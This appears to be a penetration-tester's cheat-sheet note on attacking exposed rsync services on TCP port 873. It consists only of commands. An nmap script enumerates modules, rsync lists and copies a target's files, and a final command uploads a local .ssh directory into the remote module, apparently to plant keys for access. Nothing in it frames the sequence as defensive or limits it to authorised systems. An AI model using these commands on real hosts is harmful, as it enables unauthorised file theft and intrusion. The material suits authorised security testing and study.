Notes - Attack by ports/protocols: RSYNC tcp:873
tcp/873 rsync
> nmap -sV --script "rsync-list-modules" -p873 <ip>
# list files
> rsync -av --list-only rsync://<ip>
# transfer files
> rsync -av rsync://<ip>/fox ./fox
# upload files
> rsync -av .ssh/ rsync://<ip>/fox/.ssh